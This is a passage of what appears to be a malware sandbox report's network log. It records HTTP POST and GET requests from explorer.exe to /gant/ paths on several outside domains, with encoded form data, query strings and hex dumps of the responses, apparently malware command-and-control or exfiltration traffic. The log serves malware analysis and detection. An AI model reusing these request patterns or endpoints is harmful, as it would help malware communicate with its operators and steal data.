GOxr97mG6r1yQI9kozwKfdOS75Sg6Ad1C37nDKuYgoDN3SUz~GhGI5AeWOCoTgy5ZiwLH_iBfLMQg5EyUSuv2na4XpLP09panQhHaKjLf-Ir9VcrLzd7N4BPjQPd21BYPFt8Uo4bltgf1mxaWSjQYOPhiL6bSxVczKeR3Gh9l6uLsUqEHkHHPhqRWBi3z6KNU14YARu-oagY5NqNwlMj1vu1WmrSZuzl5oNiDwGw0qWLkdvekTLMCb9d559VWLYAGaApf135C1m44pFs(ujAEp(3t-NWXSymvVcQU-vSHLDa22M4bPKJKvtvVKt66NEnoX3Uyju7xe2Lghl5u-U4eBYGs43jBBr-dNhKJx5HplkwOxAy0JBgisdBF3cAE9~_nvAvuOyfdO~GYlSeAklkdD0zFwEvbjtF5MeOxtWPzCd6VkHqxl67wZ6BrPoMgMGaNqEOykCK3XQZcCFF60sSWlKpn2MKgQpbg4gYhtEd~Mz2yaeQOZWR1pFL0aPHaMCrWGci07MhUUNJC2E34EjbfNVZmYehmOzTTn2oHVY5pTohNrPoDNGAO1tbIaVzDhNt7j0-vvyK7pCT70NJ3rKxm91OOb27O_CbZDXgaI4uIYpSBHGOFY5dCuQB07umZN(D5Rcu6SX2PCg_2Z3ZnC5b6LlWdV8T3REOKL1xQhcFOCSJ5HaWGWpe1jWsu4wD5KGTzvYyUZbVO8VnG3Pea8sTPIpJ5JOnX1~uS9p2MzKpElT7J-WXiwtzDsVLEzoaoBfRV7oVvdUMhZaxPtrMLMWLdgVzRAh6TAp5af~WhBymN9wTm6mL7K3NmafWjCcduZm08YjPVbRofYYr96WUNt6FFmAcn9~7JscdDgET0KaQ3jA-Y1JBxojz3P2gKBz5JCw19YsAG1nH6iHn5qIB06OwKpb6SIFs991nyi97tQxZ8xM8FqLpWOD6NIJOgIM1vDg4Qm2hcPojeyNJWeO7~u6Ncko6ndFsB132x7rVlpTiw6EYYhocrAMfjWiGYAhik06eFUFnEQEkjr0rq_aR8Hj-OerK8sFMKKiaQfuakPG7U4lGzCNFSAm115vNjKO1e0uVZl7A3OgHAozHseWz8osbF_J4z6(nF9kQTBhuyms1RbvwqAm-2o604O8K~2na1M3iPdoEP7vhkdaqKO~eZa9iaoMg(_GB3tJSiRNbhX63hxaxdQta5fxQqjCM~jTd15dbplT1nmmdH_omKJb2zTPYYJMa0SQecub3kZgRdOOHwLzpKGLsDKRe~NxzF70QRr5wTTURLQwdpd3cJoBV3LpbL9xW63EV7hDKTIfiDhe6T4gpKz0hRGGEwCvckNMukUNYt4blrlJR2W8Cho2u1rYnO_i_kx7VZfsSrX(bO4DtyLMX3cdiCXs-hVDGF4uslf7VIq(4jIov8WgB8lHrevnsCMHBlbMSL-gEJKPEnsvOOvcticFrBxp_zNL4sDXlJFmqMCXC2lyeGCn89zxTVq4lSoQ4yw68JCjRBn2l0baXd-Ne44fFmKqiFm4Q7eBfjNv4toOPVFnbH-qKfiFt7DEEGpA6zWnQjfih30XvkegFeYWgSsLf4DynI7PvH9C6JGu8OhyAGFxhPDSAp1qZiEAKNyaRNAB7GeGSQU7M~vy5Z69yi9yDlINcABGspKxE4WQqKdmadx6mCsj0FmGM43nLKqyYQf5SKInGB8xXN2J1atzC70pSAmU8efa5QQL9ZnLZALUHQy8_DxqmlLevV4fD~w6tSCVeuHO5o4JQlpUxpAXhjSNOM8G6ElgB6xU-ThO-GAhc0yD-DtPztuQvEQ77Ctas(8DO4kx8vbBvvq2w(ww3DlZ35ALICn3O4vgpeuwOD6qVUEnGpqedl34ynbQMZS8pB7C2s23dWjkR0OIu5BqtaHzixrnCeA9nZ04y7pVrHB9uK2iG7SjsKtUVvygibkVIk81o3F6wEQkMH2trqxcFhB7epPFgXtvlzfXRpUaaF18Crhb1GYMQkYHDWmvmmEE2WvLvUuJQnRfGBHHeCQiczf36LFWmBIyWV6ICS2dm0ykdbMMClEPFgxl5lBNIz8QsrlKJU6SIiQ1ooSGvmjSeTbmKVr5N9X~VU7qp8jHZbg50KcQvJulRp7L-x5Q_d7AQUPZuNxcqVJ10eRQ1FImuSGbtgR2UkE2q0uhnRoix3ioJPTeGdg3SvtwvdTFN2KRhfnf_J053e2IRFSrT6c36ceh4u_e_fL4roFJooN83gYZqqmfePSHcerLv0MJluk3HSfp59DK9UMehPvtPfbW2AGuL8b0q1NfybM~wKfdPiq4mrZkla42boL6rafxOVLKa5cDA1NMaIDJq516oQKmnUPq282Jy0-1kGjwDxSHevNt0KMFZO0Gj6vFEBrCdyuPv~GnFkn2KaMOiXUEgPzcb4szeEJSsM6wYoDAd2jB8KU4mlQ7XUabP8njoJdvLAC~CqdK5mP0G823i6_0W36lDzCajN0FG~-kxgjBOj4~LV2(27E76GVJP5yYM2C3CbMhUS497jabPe3ejge2ERQLp9QGa3mL6Zd7d5YIK0iqWTwlVSJYd1xSCcimRCJEYu7sdfLqr2_D1KjGzyAxyP5(ZOdegEyY0O63oTNCvUejhGpTgJ-L9KvIVWTceomZgjd1cS9pyYeplxDvjyGa64uoMr-57sLsDPVjMUDXC9lnOB6KaV7V6nFa_gx(bGImRilMSqFDlnvA2fVVqqwNkmgB2ryOGjXNpC4OMwjtm6SkhY42fXFtANEsvuMu175HIib84Hd(5le15lEaW9D6RmsgzJ3Zc0na9RZRHLFsuKks4SfJG8ujgQL(cAMAlUk2-YAlvZpL0lQL9P4UKjWNYcxfSfn7I9BM47n5ZhGXLgrEgtiCNPhI-uVUPUO61ORWwCmXI2xCZHvto9nKGMmWpnVDUnGibJZD95n(ZoYORUT~W2rTneIVqlZSt6eEq516xl_VRMv7oW7kIK
                                                                                                                  Feb 13, 2023 19:05:56.453658104 CET1601OUTData Raw: 62 71 46 4c 4c 32 38 43 4a 56 47 34 65 28 44 7e 5f 64 4c 4f 43 4a 38 67 5f 48 73 44 4d 72 46 6d 62 35 7a 4f 68 6c 45 6e 62 34 61 4b 7a 4e 37 6b 62 38 38 35 63 6e 32 44 61 63 79 39 34 6b 5f 54 6c 41 44 47 39 7e 6b 58 30 79 4b 6c 44 58 6a 49 47 77
                                                                                                                  Data Ascii: bqFLL28CJVG4e(D~_dLOCJ8g_HsDMrFmb5zOhlEnb4aKzN7kb885cn2Dacy94k_TlADG9~kX0yKlDXjIGwlJ1p16KNorI7f(bd4wZ6B(oZDLMzAtODaqqSwpMErVah_tHCNYXKxhCf7r2LNIEooF8NRZTwgIzuMD5rYtYA5GP0LqcwvrPIXVj9vRKSOSTnDOfuWGkx4WvhwBZietZPBUR22wGpV9V4rW8y588UDFP4IzfX_slUn
                                                                                                                  Feb 13, 2023 19:05:56.552932024 CET1603OUTData Raw: 4e 42 6c 38 64 61 78 49 78 28 48 58 68 6f 7a 46 50 28 30 64 38 6d 77 69 58 46 6f 57 46 30 6a 43 69 76 6e 7e 4c 47 34 55 68 32 4b 31 41 51 45 4a 65 38 35 5a 43 70 43 6a 7a 36 6b 76 66 42 79 43 65 54 7a 31 7a 4f 48 44 39 37 38 34 59 61 43 6e 77 54
                                                                                                                  Data Ascii: NBl8daxIx(HXhozFP(0d8mwiXFoWF0jCivn~LG4Uh2K1AQEJe85ZCpCjz6kvfByCeTz1zOHD9784YaCnwTaVUHMRs3G5gcUXjdHilFbY-f1SfxrYWFr8K5I4YFZqJpwmSuL(6mGk4wXHHDTWmtzarfZwNc72YPxltINa66vc4Xb~1kIlzw-cMRdHi6CaLNdztdkAAvpboRUqTqkp_XrUXYiE2O96jvf84Ha4pbtLP2cJ1zPHZSA
                                                                                                                  Feb 13, 2023 19:05:56.553126097 CET1616OUTData Raw: 72 43 74 71 4e 74 6a 4e 7a 41 51 6c 77 7a 5f 53 38 70 65 4e 46 7e 46 62 70 69 34 44 72 58 45 49 64 48 70 63 79 66 79 31 32 72 37 55 4e 7e 79 52 34 62 6a 45 59 48 4e 31 5f 79 62 73 56 61 6f 67 6d 50 43 32 61 7e 43 32 35 7e 69 55 41 34 49 4d 53 76
                                                                                                                  Data Ascii: rCtqNtjNzAQlwz_S8peNF~Fbpi4DrXEIdHpcyfy12r7UN~yR4bjEYHN1_ybsVaogmPC2a~C25~iUA4IMSvj370tv0RJX7xbo5O0l3~ZCiDR5wdL6U1CdjR84Jcfn3wN4_V35ZWb62gFeyobMhk0W70bEiBCPgKZj83bumulYPhmiblfRUr6NKDPX8XvsMR1uT8VAc9c8FH7cMZ9wx5D02iFUZS2Wi~48aNIiT6L0c6kgZfoPjtT
                                                                                                                  Feb 13, 2023 19:05:56.553267002 CET1618OUTData Raw: 49 39 39 71 72 76 63 28 56 73 4f 61 4f 30 71 66 62 42 6b 42 30 47 4a 76 65 64 6c 5a 36 6b 50 54 73 46 64 75 35 4d 43 64 35 35 33 6b 53 73 44 70 6e 6f 63 32 69 7a 6f 49 7a 51 38 48 5a 6f 78 6d 37 36 65 61 61 49 61 4b 78 78 38 43 35 68 33 44 33 69
                                                                                                                  Data Ascii: I99qrvc(VsOaO0qfbBkB0GJvedlZ6kPTsFdu5MCd553kSsDpnoc2izoIzQ8HZoxm76eaaIaKxx8C5h3D3iwpF2qC_7w5yMmww(zq98z~HHbKKpYqGF9GsLwY2CmUJpF2LmthTNoeuv-NAZNkKegOyPD~hMMJVMMZ6IVgl~boeK2(I8nj4SJopsSjVIxAebwv8b4TnPh3dFGK8dk2FRmOnoWwguwB37uUMMBMJb56MdfkTgZbth5
                                                                                                                  Feb 13, 2023 19:05:56.553441048 CET1624OUTData Raw: 55 6c 45 6a 47 28 57 73 50 73 51 39 79 75 7a 7e 76 64 77 70 55 34 39 33 4c 5a 37 47 51 52 43 77 38 7a 36 73 5a 7e 30 52 51 65 76 79 59 6d 71 6a 55 30 5f 36 37 34 5a 52 68 37 46 30 57 43 71 67 38 72 6b 32 71 4f 6d 6a 50 38 5a 65 71 48 39 70 68 6a
                                                                                                                  Data Ascii: UlEjG(WsPsQ9yuz~vdwpU493LZ7GQRCw8z6sZ~0RQevyYmqjU0_674ZRh7F0WCqg8rk2qOmjP8ZeqH9phjp6M~L7S4GLkeI1OW9k5N1bsdk3Mwyw8XrZflIldm-e3GTa7j47Dit5qvxgJ7H03Su7AfkpQha8nrXI9LDsvma8S(VpE4JMShG11v3uR2Ejfy9Fw4V6CNtW6rkMPSBFtJhJ-AC3XVy9WJTelB4doC2DUNoEKHzO8G4
                                                                                                                  Feb 13, 2023 19:05:56.553608894 CET1627OUTData Raw: 45 76 71 4b 77 75 52 51 71 4c 48 4d 55 33 65 33 51 6a 39 35 55 72 71 71 4f 4d 43 54 72 46 64 38 70 68 6b 44 4e 75 34 39 69 7e 5a 76 6a 7e 49 47 4c 56 78 77 35 68 32 75 64 4a 4f 45 36 64 6b 6c 57 63 4e 5a 65 6a 63 28 59 6d 4d 7e 41 48 44 38 35 7e
                                                                                                                  Data Ascii: EvqKwuRQqLHMU3e3Qj95UrqqOMCTrFd8phkDNu49i~Zvj~IGLVxw5h2udJOE6dklWcNZejc(YmM~AHD85~sVe8Aq8r3iGgKIho3YAZxKjRbIP~WRbdbR7e4W4pHCrjuZhEQT73Owvq6vDUK1xFh9U2FRjcpH8HlIuehXOuQo3kX2FddhzYQrXtSZ1GmRrGAXRV3e7QqujWThBrYOuVsCSCDo1TM8Mf1r3r-TfqtDDN5~qNzQnsd
                                                                                                                  Feb 13, 2023 19:05:56.652790070 CET1630OUTData Raw: 4a 59 72 31 79 76 59 73 49 62 57 7e 44 76 5f 63 51 6a 47 70 47 65 4c 55 53 28 62 64 5a 43 76 34 44 67 50 67 72 76 78 38 63 54 51 59 6b 43 30 78 36 70 51 71 36 74 52 56 77 38 6e 47 58 76 4e 70 6d 58 63 71 32 65 59 6a 6a 6c 38 68 69 43 35 4e 6c 59
                                                                                                                  Data Ascii: JYr1yvYsIbW~Dv_cQjGpGeLUS(bdZCv4DgPgrvx8cTQYkC0x6pQq6tRVw8nGXvNpmXcq2eYjjl8hiC5NlYywM1VEJD6Y7RNLWtkcsyCCEN7ZPwLCC6foR0_lye86w~cpEOlKki-F42o(noFmbNymYQA3ZEQ3iDRBw8SDCrEsSQRQar8XwNmKho5eab-LlQo51(C544SzDvXUiHjgb~aSYNsFItTkIdaOWegxfYXGWfWXBdyZkke
                                                                                                                  Feb 13, 2023 19:05:56.652935982 CET1640OUTData Raw: 39 38 50 47 7a 7a 72 74 77 66 61 70 59 6d 4b 52 71 52 51 33 48 38 35 6a 59 41 64 50 48 78 6c 53 68 48 32 74 35 6c 43 6f 75 32 31 59 56 4b 58 4d 4d 4a 6c 57 48 56 4a 30 4c 55 63 4f 45 38 2d 34 36 61 4f 76 32 63 63 5a 54 5a 69 32 42 70 57 70 78 32
                                                                                                                  Data Ascii: 98PGzzrtwfapYmKRqRQ3H85jYAdPHxlShH2t5lCou21YVKXMMJlWHVJ0LUcOE8-46aOv2ccZTZi2BpWpx24Oo~kqReB0iGq6qIQCANjez52K-3En3PZ445bAXLEZGEjOZN0iZ1ojYqD70HscrVG6JRk3BXmAQwJWSVL2bSEVvzPxkzy6YQxsVMvfyRKbkSsByKmL9GGZ4NzJc7_lDV5Hk5QqfLavWBwDC1z7asPUsmE1A5DFYwz
                                                                                                                  Feb 13, 2023 19:05:56.962124109 CET1642OUTData Raw: 47 76 6a 77 72 32 59 72 38 32 64 37 28 68 59 71 68 6f 6e 4b 61 56 64 50 34 50 68 38 4f 57 71 66 59 48 53 4e 61 73 34 56 71 38 73 72 49 45 62 44 37 32 28 6a 58 58 75 54 7e 5f 67 4f 33 4e 55 70 37 79 46 48 58 46 61 4f 34 50 66 79 39 46 67 68 51 52
                                                                                                                  Data Ascii: Gvjwr2Yr82d7(hYqhonKaVdP4Ph8OWqfYHSNas4Vq8srIEbD72(jXXuT~_gO3NUp7yFHXFaO4Pfy9FghQRts6djxU_B_A3hshmxhbkASTKWwUgjRitLBiDyPgQusdfND~5o_4sb5QWelEFQw0eFR(3xpb4otm2OVRi0R2uGdiMzzpzh-IrU0E0jslotmMtZypKqHie(gGfNNyEEwcu(cbHGnsrETlXFloGF8cCxlAaoI82WjoDs
                                                                                                                  Feb 13, 2023 19:05:57.274633884 CET1644OUTData Raw: 6b 76 44 57 52 7e 79 54 73 41 38 68 78 76 65 37 6e 67 59 55 35 6e 4f 55 53 70 51 50 4d 63 72 35 53 50 63 52 4a 4d 4b 50 2d 49 51 58 74 33 33 47 6d 5a 53 43 6a 5a 65 73 63 42 51 31 5f 55 32 71 4b 58 54 65 47 67 78 4b 67 53 6b 6e 44 31 36 62 41 63
                                                                                                                  Data Ascii: kvDWR~yTsA8hxve7ngYU5nOUSpQPMcr5SPcRJMKP-IQXt33GmZSCjZescBQ1_U2qKXTeGgxKgSknD16bAclYHvLcaKNTW2RRffmExShcRBBWGCHoUhEzb9UvGa5zKcws5r8QJOlF8fd3EQKFMkmCSeNu3Mr~8IV4sL38XfCopcp8zx-oYt1Fz1waHgHuikBNBTLAYTDTzkdwe(Kx002Z32Fgua31Xt2foM7mP3l2ntANbDrhR2h
                                                                                                                  Feb 13, 2023 19:05:57.999003887 CET1646INHTTP/1.1 200 OK
                                                                                                                  Connection: close
                                                                                                                  x-powered-by: PHP/7.4.33
                                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                                  retry-after: Sat, 25 Mar 2023 11:59:00 UTC
                                                                                                                  content-length: 771
                                                                                                                  content-encoding: gzip
                                                                                                                  vary: Accept-Encoding
                                                                                                                  date: Mon, 13 Feb 2023 18:05:57 GMT
                                                                                                                  server: LiteSpeed
                                                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 cd 56 4b 6f e3 36 10 be 07 c8 7f 18 30 40 7a d8 4a b4 ec d4 eb 24 92 16 c5 02 3d 15 e8 61 17 ed 99 96 46 12 61 8a 64 c9 91 15 ff fb 82 94 15 ab 49 bb 45 fa c2 1e 4c 0f 87 1c f2 fb e6 45 5d 5f 5d 5f 01 84 df 1f 8d 39 49 52 58 fe 28 0e 08 3f 4b 1c e1 fb 81 4c 2f 04 49 a3 41 7a 18 74 8d 0e 2a a3 3d b9 a1 0a da 9c 4f 26 af 4f cc 95 d4 07 e8 1c 36 05 eb 88 ac 7f e0 bc 31 9a 7c ba 1f b4 3e a5 1a 89 57 de 7f 68 44 2f d5 a9 f8 c1 61 6d 0e e2 dd 4f 1a 19 38 54 05 f3 74 52 e8 3b 44 62 e5 74 fc 74 e4 cb c5 c5 1d 0f 9c 2b 71 c0 a3 c4 51 44 e4 01 62 5a 99 9e 8f 36 a9 8c 26 d4 c4 ad 1a 5a a9 3d 8f 64 82 f6 99 4c 62 45 8b 9c 3a ec d1 07 6c 7c 6f 0c 79 72 c2 a6 bd d4 69 40 7b 2c 36 e9 fd 96 01 9d 2c 16 8c f0 29 92 60 e5 d5 ff 8e ad 32 7d 1f c8 7d 3d a0 94 f1 58 f3 18 b6 af 09 96 f7 31 ef 12 31 a2 37 3d be 29 94 b2 32 9a fd 47 09 26 7b d1 a2 e7 8d 38 86 5b 52 ab 5b 06 3c 66 fa f5 a2 48 f3 5a 1e 41 d6 05 eb d0 99 24 da cc e5 00 90 cb be 05 ef aa a9 c2 fe d5 ec 9f 82 59 c5 bf 09 9b 50 54 b0 4f 92 30 74 82 cf d8 5b e3 84 93 ea 04 1f e3 26 68 8c 83 8f 8b 6a 62 10 5b c3 db 6c e6 4a e7 b5 3c ce 72 f0 40 a5 84 f7 05 0b 35 2c a4 46 17 7c 30 35 05 80 e8 a2 f3 06 67 c6 8b 7b 7e bf 54 19 95 3c f9 24 5b 43 90 fa 7a 96 54 9b 64 eb a5 11 40 de 65 e5 27 e3 dc e9 5b 18 f1 1b 87 50 1b a9 5b 08 e9 03 a3 71 07 30 1a a8 43 f0 92 30 e7 5d 76 46 1a 9a 6a be 40 7e 99 fd 53 a8 bb 19 b3 69 1a 8f 94 4c 1c 54 9b bc 9c ef 5e 10 b1 4b cf a1 26 56 7e ee 84 3e c0 c9 0c 31 60 7b 0c c4 ac 20 89 9a 52 f8 05 41 7c 99 2e 08 5d c3 28 95 82 3d c2 5e 54 07 f0 9d 71 a4 4e 69 ce ed df f6 43 cc 70 6f 2a 29 d4 92 c0 32 b2 6f 09 9f 58 94 6c 78 77 84 95 e9 d8 09 f2 c2 da f8 1c 78 d4 f5 07 db 19 8d c5 7a 73 b7 cb b6 db dd dd e6 fd 76 c3 ca 5c ce 1e 6b 04 34 22 99 cd 82 bc 79 62 65 ce 65 99 73 51 e6 f3 1d bd 90 8a cc c3 ed 4d b6 fa ee f1 f6 26 cb 56 61 5c ad a3 9c 3d de de ac b6 77 51 b3 0b f2 fd fb 28 4f 63 58 cd b2 a0 3f db ae 26 cd 7d d8 79 b7 8d fb 83 9c 65 51 bf ba 7f 7c 8d 0f f5 11 95 b1 f8 a7 f8 08 d5 c3 bb bf 20 19 3d 91 f8 5f 87 10 fc 17 44 e7 d4 bd 24 73 48 f3 cb ec fc 34 2f d2 fe b9 65 29 d3 4a 9d ec 07 a2 d0 45 cf 15 aa 4c db 62 6d 06 62 17 1f 86 ef 83 2f 76 af 78 52 6a 3b fb da 01 a3 71 b5 75 e8 7d 00 be 7e 62 20 9c 14 49 27 eb 1a 75 c1 c8 0d b8 08 da 33 ca d0 3d 7e 03 54 89 bc 6f 0c 09 00 00
                                                                                                                  Data Ascii: VKo60@zJ$=aFadIELE]_]_9IRX(?KL/IAzt*=O&O61|>WhD/amO8TtR;Dbtt+qQDbZ6&Z=dLbE:l|oyri@{,6,)`2}}=X117=)2G&{8[R[<fHZA$YPTO0t[&hjb[lJ<r@5,F|05g{~T<$[CzTd@e'[P[q0C0]vFj@~SiLT^K&V~>1`{ RA|.](=^TqNiCpo*)2oXlxwxzsv\k4"ybeesQM&Va\=wQ(OcX?&}yeQ| =_D$sH4/e)JELbmb/vxRj;qu}~b I'u3=~To


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  71192.168.11.2049929142.44.131.17780C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:05:59.078337908 CET1647OUTGET /gant/?j-Jh9P=lG1MXAoVmwgOpPlDaO5uOCVJTMHwk/fdWy8fBrW3vMUx4Eu1HaIGqjrCYnGNSU+uIBrfqi0XYB7pKAHIVdBFrPjvfY3MgrPiTA==&T9=bPxTYTKdI2 HTTP/1.1
                                                                                                                  Host: www.lakeviewautomation.com
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Feb 13, 2023 19:05:59.575496912 CET1648INData Raw: 69 74 65 20 69 73 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 43 6c 6f 73 65 64 20 66 6f 72 20 43 6f 6e 73 74 72 75 63 74 69 6f 6e 22 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65
                                                                                                                  Data Ascii: ite is Temporarily Closed for Construction"> </div> <div class="container"> <div class="row"> <div class="col-xs-12 col-md-12 col-lg-12"> <h1>Sorry, we're doing some work on the site</h1> </div>
                                                                                                                  Feb 13, 2023 19:05:59.575611115 CET1648INData Raw: 61 20 66 61 2d 77 6f 72 64 70 72 65 73 73 20 66 61 2d 32 78 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 20 20 0d 0a 0d 0a
                                                                                                                  Data Ascii: a fa-wordpress fa-2x" aria-hidden="true"></i></a></div>
                                                                                                                  Feb 13, 2023 19:05:59.702617884 CET1650INHTTP/1.1 200 OK
                                                                                                                  Connection: close
                                                                                                                  x-powered-by: PHP/7.4.33
                                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                                  retry-after: Sat, 25 Mar 2023 11:59:00 UTC
                                                                                                                  content-length: 2316
                                                                                                                  date: Mon, 13 Feb 2023 18:05:59 GMT
                                                                                                                  server: LiteSpeed
                                                                                                                  Data Raw: 0d 0a 0d 0a 20 20 0d 0a 20 20 20 20 0d 0a 20 20 20 20 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4c 61 6b 65 20 56 69 65 77 20 41 75 74 6f 6d 61 61 74 69 6f 6e 20 69 73 20 75 6e 64 65 72 20 63 6f 6e 73 74 72 75 63 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 62 75 6e 6e 79 2e 6e 65 74 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 46 72 65 64 6f 6b 61 2b 4f 6e 65 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6c 61 6b 65 76 69 65 77 61 75 74 6f 6d 61 74 69 6f 6e 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 3f 76 3d 33 2e 39 36 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6c 61 6b 65 76 69 65 77 61 75 74 6f 6d 61 74 69 6f 6e 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 63 73 73 2f 63 6f 6d 6d 6f 6e 2e 63 73 73 3f 76 3d 33 2e 39 36 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6c 61 6b 65 76 69 65 77 61 75 74 6f 6d 61 74 69 6f 6e 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 63 6c 6f 73 65 64 2f 73 74 79 6c 65 2e 63 73 73 3f 76 3d 33 2e 39 36 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6c 61 6b 65 76 69 65 77 61 75 74 6f 6d 61 74 69 6f 6e 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 3f 76 3d 33 2e 39 36 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6c 61 6b 65 76 69 65 77 61 75 74 6f 6d 61 74 69 6f 6e 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0d 0a 20 20 0d 0a 0d 0a 20 20 0d 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 68 65 72 6f 2d 69 6d 61 67 65 22 3e 0d
                                                                                                                  Data Ascii: <title>Lake View Automaation is under construction</title> <link href="https://fonts.bunny.net/css?family=Fredoka+One" rel="stylesheet"> <link rel="stylesheet" href="http://lakeviewautomation.com/wp-content/plugins/under-construction-page/themes/css/bootstrap.min.css?v=3.96" type="text/css"><link rel="stylesheet" href="http://lakeviewautomation.com/wp-content/plugins/under-construction-page/themes/css/common.css?v=3.96" type="text/css"><link rel="stylesheet" href="http://lakeviewautomation.com/wp-content/plugins/under-construction-page/themes/closed/style.css?v=3.96" type="text/css"><link rel="stylesheet" href="http://lakeviewautomation.com/wp-content/plugins/under-construction-page/themes/css/font-awesome.min.css?v=3.96" type="text/css"><link rel="icon" href="http://lakeviewautomation.com/wp-content/plugins/under-construction-page/themes/images/favicon.png" /> <div id="hero-image">
                                                                                                                  Feb 13, 2023 19:05:59.801971912 CET1651INData Raw: 0a 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 6c 61 6b 65 76 69 65 77 61 75 74 6f 6d 61 74 69 6f 6e 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69
                                                                                                                  Data Ascii: <img src="http://lakeviewautomation.com/wp-content/plugins/under-construction-page/themes/closed/closed.png" alt="Site is Temporarily Closed for Construction" title="Site is Temporarily Closed for Construction"> </div> <div cl


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  72192.168.11.2049930217.160.0.6480C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:06:12.896269083 CET1653OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.performingartshub.co.uk
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 188
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.performingartshub.co.uk
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.performingartshub.co.uk/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
